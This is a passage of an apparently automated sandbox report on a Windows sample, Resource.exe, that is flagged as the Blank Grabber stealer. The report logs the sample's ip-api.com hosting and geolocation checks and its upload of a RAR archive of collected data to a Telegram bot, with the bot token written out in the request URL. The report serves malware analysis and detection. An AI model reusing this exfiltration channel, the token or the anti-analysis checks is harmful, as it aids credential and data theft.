                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057765961 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057807922 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.066852093 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067188978 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067205906 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067224026 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067240953 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067255974 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067265987 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067303896 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067344904 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067356110 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067372084 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067380905 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067404032 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.067436934 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.071846008 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.071970940 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.071990013 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.071990967 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.072002888 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.072019100 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.072041035 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.072052002 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.072061062 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.072082043 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.072096109 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.072114944 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.072932005 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:40.033054113 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:40.033076048 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:40.033174992 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:40.033178091 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:40.033230066 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:40.033951044 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:40.131159067 CET4984980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:40.136203051 CET8049849208.95.112.1192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:40.136651039 CET4984980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:57.871493101 CET5926953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:57.880270004 CET53592691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.296700001 CET5678553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.303673029 CET53567851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:37.494462967 CET6394953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:37.501096964 CET53639491.1.1.1192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.401953936 CET5981753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.408791065 CET53598171.1.1.1192.168.2.5
                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:57.871493101 CET192.168.2.51.1.1.10xb188Standard query (0)blank-63z6o.inA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.296700001 CET192.168.2.51.1.1.10x928aStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:37.494462967 CET192.168.2.51.1.1.10xb836Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.401953936 CET192.168.2.51.1.1.10x6b08Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:57.880270004 CET1.1.1.1192.168.2.50xb188Name error (3)blank-63z6o.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.303673029 CET1.1.1.1192.168.2.50x928aNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:37.501096964 CET1.1.1.1192.168.2.50xb836No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.408791065 CET1.1.1.1192.168.2.50x6b08No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            • api.telegram.org
                                                                                                                                                                                                                                                            • ip-api.com
                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.549709208.95.112.1806048C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.318236113 CET117OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            User-Agent: python-urllib3/2.1.0
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.807560921 CET175INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 06 Jan 2025 15:17:59 GMT
                                                                                                                                                                                                                                                            Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 6
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            X-Ttl: 60
                                                                                                                                                                                                                                                            X-Rl: 44
                                                                                                                                                                                                                                                            Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                                                                                                                            Data Ascii: false


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192.168.2.549849208.95.112.1806048C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:37.506776094 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                                                                                                                                                            Host: ip-api.com
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            User-Agent: python-urllib3/2.1.0
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.155705929 CET381INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 06 Jan 2025 15:18:37 GMT
                                                                                                                                                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                            Content-Length: 204
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            X-Ttl: 21
                                                                                                                                                                                                                                                            X-Rl: 43
                                                                                                                                                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                                                                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.549853149.154.167.2204436048C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-06 15:18:39 UTC268OUTPOST /bot6723507541:AAFus4a_vfOH23XVGo8SFLxAeDedGw1G3vk/sendDocument HTTP/1.1
                                                                                                                                                                                                                                                            Host: api.telegram.org
                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                            Content-Length: 757011
                                                                                                                                                                                                                                                            User-Agent: python-urllib3/2.1.0
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=4f135cb48c13ab6db74f60ce4e8d2c0e
                                                                                                                                                                                                                                                            2025-01-06 15:18:39 UTC16384OUTData Raw: 2d 2d 34 66 31 33 35 63 62 34 38 63 31 33 61 62 36 64 62 37 34 66 36 30 63 65 34 65 38 64 32 63 30 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 61 6c 66 6f 6e 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 bd b8 91 7f 21 04 00 00 01 0f e1 4f 41 2f 94 3d 26 70 25 e8 ec 1f 9c c0 61 56 8b c1 22 fb ba 88 f9 6f ee 20 21 6a 6b 28 65 ee 11 f5 84 e1 8d b8 2a 46 39 94 65 f5 10 7c 30 7c 33 08 40 aa 29 46 b3 4b 48 3f 9a 5b 49 5a ea 68 cf 92 8a 4a 6f c9 40 f3 f4 c0 f0 2b 45 d2 3c af 7f
                                                                                                                                                                                                                                                            Data Ascii: --4f135cb48c13ab6db74f60ce4e8d2c0eContent-Disposition: form-data; name="document"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!!OA/=&p%aV"o !jk(e*F9e|0|3@)FKH?[IZhJo@+E<
                                                                                                                                                                                                                                                            2025-01-06 15:18:39 UTC16384OUTData Raw: 5a c9 2d e1 b9 c5 dd 42 62 e1 57 fc 19 75 a0 bb 84 f3 d7 53 88 4f 90 ef ce da 68 92 fe 02 2b 0f fe b5 e3 2a 46 df 51 60 bd 77 e7 4a cf f6 80 44 9a 2b 3a ed 44 f9 8d 97 42 34 e6 fd 9a e7 55 8d 6d 45 05 47 cf 68 8e a9 3e 0d 32 a0 cf 05 a0 d5 91 f9 00 10 af e1 08 b6 ce 8d d6 02 99 4c f2 8a 89 7c 63 fb e1 7f 4b 80 d5 a1 fc a0 7c 41 1e 2d 23 2a bc 89 f2 08 22 c5 7c 43 58 a2 03 99 d1 24 c0 3f 0f ca ad 17 33 56 11 0a 59 25 a3 64 ae 13 44 09 88 6e 2a 4d 42 30 0c 49 be f1 44 25 d6 42 09 82 9f 60 02 a2 ea 8f 76 d8 4e b8 88 89 1f fd 09 8a 81 d5 02 d9 5e 02 39 9c 65 c8 b2 44 38 69 84 70 8d 54 fd ec a8 af f9 da a0 02 c5 1e db c6 75 ea c0 39 4c 7d ce 79 c2 81 ac d7 4f 77 b6 c0 cb 63 8a 1d 88 7c 9f cb f2 c3 bd 7d 84 c6 b7 82 e3 c3 2f 22 19 28 6f 9d 66 30 1b 07 e8 84 8f
                                                                                                                                                                                                                                                            Data Ascii: Z-BbWuSOh+*FQ`wJD+:DB4UmEGh>2L|cK|A-#*"|CX$?3VY%dDn*MB0ID%B`vN^9eD8ipTu9L}yOwc|}/"(of0
                                                                                                                                                                                                                                                            2025-01-06 15:18:39 UTC16384OUTData Raw: 4e 9f c4 6e 62 43 9e 4c a1 1c 4e c5 55 76 2d 08 79 35 14 f1 37 8c 48 0b 3c 2b 76 37 e2 ce 9c 1b 8c 70 d8 36 9d 65 d2 bd 43 87 e4 a5 4a 4e f0 b8 40 2f 87 ac e5 df 1a 86 ff e3 e7 5a d1 f8 a5 ad 33 72 83 0c d7 75 7d e3 81 5e 0e 55 cd 0b 29 b2 56 e3 c2 de 58 26 ac 30 56 7a ff b7 19 62 34 22 a9 23 d3 65 3e 93 d4 9c 51 4c cd ef cf af fb ba 2b d2 fc cb 8c 55 bd 3b eb 7d 4e 4d e9 52 66 04 89 60 d2 2a d4 b9 a9 f8 2c b3 e9 02 69 71 33 ef fe 2a da b5 60 5d f4 06 fa 43 27 b6 19 5e 03 64 3c c5 58 45 7e d4 7b e6 bd fb b9 b8 f8 89 90 cc e9 12 9a 33 da 13 e3 27 84 ca 90 9a 62 65 57 e9 40 63 b9 9d 07 dc c5 f5 f6 66 49 36 37 41 a3 64 74 3c 13 1b d2 95 22 d6 63 e0 97 4c fe ee 0d 28 e4 6a c4 10 fe e1 9a 7f 16 07 a4 4c 01 a0 69 73 db 86 59 dd b8 8b dd 96 96 3e 2f 69 93 2b 57
                                                                                                                                                                                                                                                            Data Ascii: NnbCLNUv-y57H<+v7p6eCJN@/Z3ru}^U)VX&0Vzb4"#e>QL+U;}NMRf`*,iq3*`]C'^d<XE~{3'beW@cfI67Adt<"cL(jLisY>/i+W
                                                                                                                                                                                                                                                            2025-01-06 15:18:39 UTC16384OUTData Raw: 65 95 f6 31 2b c0 c0 4a 7f bc 08 10 0c e8 98 e0 af a4 ef f1 c3 5a f9 d9 15 d3 c9 2a 72 c3 01 7a 3e 1c 8d 52 11 3f c9 81 69 a9 1f 76 df ed 13 61 34 1f af 3a 4e 62 fd 11 73 49 c9 4f f0 87 fb 18 19 27 d4 46 a1 6f 1c 41 e2 a1 0d f1 42 af cb 84 51 d6 3f 5c a4 7e c4 13 83 62 7c 36 50 32 70 05 a1 34 e0 22 5b 9f fb 0d 7f e2 29 ce e1 65 65 46 22 e2 8c 7d 9b 97 a3 57 5f 32 f1 dd 33 bb 29 1f 5c 1f 0a 31 06 bf 42 1f 4c 16 83 a7 38 0f 1a f6 9d 86 94 1f e4 a8 d8 40 e1 e1 fc 9e eb 82 dd 86 df 09 25 20 d0 ef 65 f7 a2 70 4e 87 6e e9 28 2d 8a 95 6f 54 22 3e d7 c0 b1 bb 9f 7a 27 4f f8 d2 9d 59 6c da a2 9d 99 09 3c bf 9d 0f 33 2f 99 f4 bc 6b e1 39 a7 82 0d 3c 46 71 66 0f 97 2c 09 87 3f b3 de a3 ea f5 94 13 14 97 99 68 d7 02 d8 80 3f 8e 89 ad cb e1 9f 42 42 52 74 51 fc 17 50
                                                                                                                                                                                                                                                            Data Ascii: e1+JZ*rz>R?iva4:NbsIO'FoABQ?\~b|6P2p4"[)eeF"}W_23)\1BL8@% epNn(-oT">z'OYl<3/k9<Fqf,?h?BBRtQP
                                                                                                                                                                                                                                                            2025-01-06 15:18:39 UTC16384OUTData Raw: be 58 fe 51 67 c2 b9 20 f9 f4 b1 02 ab cc bc e0 91 c7 27 f5 7a 13 d4 5e c1 b5 4b 73 27 30 08 94 4e 71 98 36 bc 02 c3 24 28 1d 71 f1 9b 5b 69 35 e0 cd ae 7f 85 85 09 95 15 12 38 75 74 f8 c3 a5 57 b0 5c 8a 4e b1 57 6f 51 a1 19 81 e7 ed df df 44 cc a5 bd 7e 1c e3 c2 b6 e0 97 59 50 98 a7 16 a9 6e 30 e6 e1 f2 92 2f e2 43 18 50 96 78 5d b8 80 c9 97 fa d8 d8 6a c4 00 d4 77 05 38 ab c1 b0 c7 86 02 7e b2 84 df c5 5c d0 39 2d 85 da 4a d4 1b 4c 70 2a 3f 4d 89 b3 46 62 a3 cd fd 2a 7f dc f5 6d 69 53 a9 92 21 be b7 87 12 ab 2d 6a da f5 45 bf 08 a2 08 19 25 12 3d 46 16 da ec 29 ba dd ee 94 28 4e 66 d8 f8 92 27 ef bb dd 8e c3 e6 4a e6 2e f4 da af f0 f3 e4 06 f3 5b 07 fc 8e e0 54 95 4b 46 9e fc 37 c4 d3 c8 40 c9 23 52 32 34 a0 10 03 45 be 42 95 bc ce 94 1e 29 46 22 11 85
                                                                                                                                                                                                                                                            Data Ascii: XQg 'z^Ks'0Nq6$(q[i58utW\NWoQD~YPn0/CPx]jw8~\9-JLp*?MFb*miS!-jE%=F)(Nf'J.[TKF7@#R24EB)F"
                                                                                                                                                                                                                                                            2025-01-06 15:18:39 UTC16384OUTData Raw: c2 08 be 31 9b 42 3a 85 eb c3 49 e1 a0 04 68 59 b2 c5 27 56 b7 ff 02 99 08 6d a7 f5 c7 35 61 6a b7 0f ca 32 0e 95 7b 71 16 2f 59 f0 65 cb 2f 09 a8 a7 70 da 51 39 64 99 0c f0 8e 65 3b 0e 01 05 f2 7a 43 2c 9a 33 72 c3 5c ba 6d c1 b2 18 bc 2b d0 dd 6e 0f 7c 88 40 dd b0 2f d7 78 c1 f9 37 f9 88 0a ac 12 10 2c 3d ce 8b 54 4a 0d 74 37 96 c5 a3 c3 ff 22 f4 c0 63 0b d1 60 d4 a0 16 d1 91 e1 a9 fc 39 81 cb 62 68 57 28 af e2 b2 cf 62 bd 05 a7 0b d2 f2 42 83 93 4a 0c 52 2c b2 e3 fa 59 61 a2 7c 36 c9 5c 10 0d 8d 62 2d be 2d 39 dd 0a 61 c7 54 12 3a 3f ed 28 3d 4d a7 2b 02 db 59 f6 80 fa cb 27 ee 87 53 aa 47 f7 b3 1a 19 8a 0d 83 b0 fb 2d f4 f8 5a e3 9d c9 28 b8 19 60 ea b4 90 38 23 d8 c7 9c 4a 09 6c b5 f2 12 eb 29 3e 4e da 6d fd f3 a3 1a 01 69 d9 f4 6f 9c 6f 4b 42 3c fc
                                                                                                                                                                                                                                                            Data Ascii: 1B:IhY'Vm5aj2{q/Ye/pQ9de;zC,3r\m+n|@/x7,=TJt7"c`9bhW(bBJR,Ya|6\b--9aT:?(=M+Y'SG-Z(`8#Jl)>NmiooKB<
                                                                                                                                                                                                                                                            2025-01-06 15:18:39 UTC16384OUTData Raw: dd 55 d7 fd f3 b1 76 dd fe 56 cb 91 d7 a5 59 ac 82 9c d2 c1 31 79 a4 2d e6 b8 76 7a 6e ee 28 cc 0e 1c f3 27 06 3b 32 e3 a0 ba 8c a5 2d ea 01 ec 6a 9d 7a 9e d8 08 2c 21 96 c1 8f 50 ff a4 16 2b 06 8c c2 56 23 67 4c 99 55 f8 e5 72 6f 63 66 c6 3b db eb 34 e6 f4 d7 51 1f 90 86 9e b7 c8 f7 aa 36 09 d7 8b fd 15 9c c7 3d 14 4c 57 cd f7 64 0b cd c0 c3 82 8d 95 77 ca 52 7f b4 ea 80 a9 95 7a 4f 64 96 2d c7 4f e3 da ac 0e ca 9b 46 48 a8 21 40 1c ae 51 90 10 96 b6 e8 35 50 29 e4 85 02 e8 d4 a4 2a 6b a9 f9 74 6b 70 e0 ee 6e 84 49 5a 8a 1c 0d 7a 94 bf 40 21 4a 1e c7 03 31 c5 5f d7 14 a4 40 65 b0 d8 36 5f 85 36 ba 42 35 3a 44 24 ec e3 16 2a 5d 95 b0 af 86 16 c7 62 76 67 69 6c f5 7f 8a 4b fe 9f ce 90 a4 81 6a 55 7f 10 22 dd 19 12 4a c2 69 55 9f 2f 17 ae 74 b6 bd 3c 56 87
                                                                                                                                                                                                                                                            Data Ascii: UvVY1y-vzn(';2-jz,!P+V#gLUrocf;4Q6=LWdwRzOd-OFH!@Q5P)*ktkpnIZz@!J1_@e6_6B5:D$*]bvgilKjU"JiU/t<V
                                                                                                                                                                                                                                                            2025-01-06 15:18:39 UTC16384OUTData Raw: a2 e2 5f 5b 9b ab b3 f6 d5 5c 33 ad b4 b5 37 b4 95 24 e3 6c 2b 14 0e df e1 ee fa 60 58 59 a9 0f f9 3c dc 30 45 df 2a 58 2b 36 9e 5b 22 3e 6f 0b 2b 88 49 83 72 ea 26 0c 00 14 66 e4 99 8d 79 df 4d 5f d8 d6 bc 54 87 66 44 02 4b 9e 0a e4 04 af f2 e4 46 73 b3 e1 75 16 72 1d 25 67 34 83 c6 9b b8 39 0c 11 8a 2d ba 78 88 5c c6 d7 9e 08 6e b6 91 4d 6f e6 6d 28 ec 3b bb 80 8c ce e6 d7 ec 65 a7 2d 28 37 5c 78 24 6c 27 36 b6 51 f5 b2 e1 3d b2 98 58 8a 7d c3 b8 bb 71 34 9d 04 d0 95 51 e4 9c 2a 48 4c c9 67 87 a7 c4 d3 3a cc 8e db af 36 f9 a8 31 d4 76 75 f4 50 b1 db e4 61 6a 67 d4 b6 a8 5f 6a a2 5e d1 6b 28 65 4b dc 36 67 f2 bc 43 62 d6 a9 08 22 dc 80 67 ae fe 49 dd d6 7c ba b7 10 9c c6 9d 4c e8 5c bc 37 37 9e 9b 2e 53 bf cc 61 1b c3 c8 cf bc 84 ca 32 41 65 fe 51 3a 6a
                                                                                                                                                                                                                                                            Data Ascii: _[\37$l+`XY<0E*X+6[">o+Ir&fyM_TfDKFsur%g49-x\nMom(;e-(7\x$l'6Q=X}q4Q*HLg:61vuPajg_j^k(eK6gCb"gI|L\77.Sa2AeQ:j
                                                                                                                                                                                                                                                            2025-01-06 15:18:39 UTC16384OUTData Raw: 49 20 ce 12 ae 92 b6 ec 05 01 cb 76 c9 86 69 fc 7e f2 d5 69 bb ab 6b 49 f6 49 a6 89 75 26 92 6a ff 3a 1e b8 2a bb f9 f0 40 c6 6a 52 e7 2b a6 9d be 0a 24 a6 2e ef 1a 57 dd 1b 6f 1d 9d 21 d9 71 cf ce 43 c3 94 ff 4b 55 db 27 7a 13 ba 7b 5f ea a7 45 f4 a8 41 fc eb c5 df 9c 93 71 8d 63 8f 43 bf ba 55 f0 a7 b1 12 5b 07 14 e9 3e 7b ba 0d f7 47 c5 43 9b 7f b5 00 d7 3f b8 99 31 eb c3 7e 78 1a 39 62 d9 ec e2 58 02 5c bf 1e 0e ef 0e e5 68 50 86 82 89 b0 06 9f f4 eb 5a 41 42 59 3a de 67 73 c6 97 27 98 9b 46 cf 60 df 70 ac b1 9f 46 26 83 81 ec 66 0f e1 fb 60 c7 40 bf 43 59 8f b3 ac b8 1f d4 8a 1e 10 c3 c9 8a ce 33 15 47 9c 2b 24 19 78 15 d5 e8 40 d3 9b 9d b4 4d 17 c9 78 33 52 4e dc e4 ee ca a5 d1 80 b9 97 92 1f 15 f6 f5 ab 25 c0 5d 10 73 fe da 35 64 8d f1 ff 03 ba 5c
                                                                                                                                                                                                                                                            Data Ascii: I vi~ikIIu&j:*@jR+$.Wo!qCKU'z{_EAqcCU[>{GC?1~x9bX\hPZABY:gs'F`pF&f`@CY3G+$x@Mx3RN%]s5d\
                                                                                                                                                                                                                                                            2025-01-06 15:18:39 UTC16384OUTData Raw: 53 a7 ac 86 42 f6 ae 42 ab f1 ec 43 89 f3 a7 01 fe db 08 7f 49 f3 f6 23 66 80 ac ef d6 af b1 cc 6a 13 e2 b4 c4 d5 ce 0f 88 95 d4 5c 37 7f 7c 22 56 57 2a f4 69 d4 99 61 96 12 5b 10 50 9c ea ff d8 f6 f8 bb 75 cd ee 4d d4 e8 b5 5b b8 f0 5f 4e ce 03 82 ef 1d 6e cd 49 ff d3 e6 39 6b 97 8a 3a f1 e9 b8 37 5c c2 e6 cd ce 85 da e1 00 b0 ea 06 60 ae 1e 10 2e 0b 9c dd 63 d1 45 74 aa 62 56 fc c8 3f 80 19 09 0d 97 41 8a ef da 6f 39 c0 66 60 ac af 07 07 b5 fd be ba 34 32 ce 20 6b 98 81 77 98 f9 46 e6 3d a5 0c c9 a9 df df 75 5d 59 ca 64 f7 44 ed f2 b2 b1 f8 bb 9b 06 5a 78 e3 4f 27 62 05 79 fe 2a 80 b6 7d ff a3 c1 1d cd ce 50 ad 78 e7 c9 6d 64 e1 4a 68 f0 aa 4a e0 b4 5a 64 d1 cf 2c b2 2a 4b 94 d4 04 58 22 7b 35 b9 3c 7b 55 dd ab dd fb 57 1c 9e 96 33 9b d3 e0 86 24 22 30
                                                                                                                                                                                                                                                            Data Ascii: SBBCI#fj\7|"VW*ia[PuM[_NnI9k:7\`.cEtbV?Ao9f`42 kwF=u]YdDZxO'by*}PxmdJhJZd,*KX"{5<{UW3$"0
                                                                                                                                                                                                                                                            2025-01-06 15:18:40 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Server: nginx/1.18.0
                                                                                                                                                                                                                                                            Date: Mon, 06 Jan 2025 15:18:39 GMT
                                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                                            Content-Length: 1673
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                                            Start time:10:17:54
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Resource.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff6e60a0000
                                                                                                                                                                                                                                                            File size:7'714'511 bytes
                                                                                                                                                                                                                                                            MD5 hash:CD56D1639C638EF44A1CBCF6756EF2BA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2019140558.00000203A2F47000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2019140558.00000203A2F49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                                            Start time:10:17:54
                                                                                                                                                                                                                                                            Start date:06/01/2025
                                                                                                                                                                                                                                                            Path:C:\Users\user\Desktop\Resource.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:"C:\Users\user\Desktop\Resource.exe"
                                                                                                                                                                                                                                                            Imagebase:0x7ff6e60a0000
                                                                                                                                                                                                                                                            File size:7'714'511 bytes
                                                                                                                                                                                                                                                            MD5 hash:CD56D1639C638EF44A1CBCF6756EF2BA
                                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Yara matches:
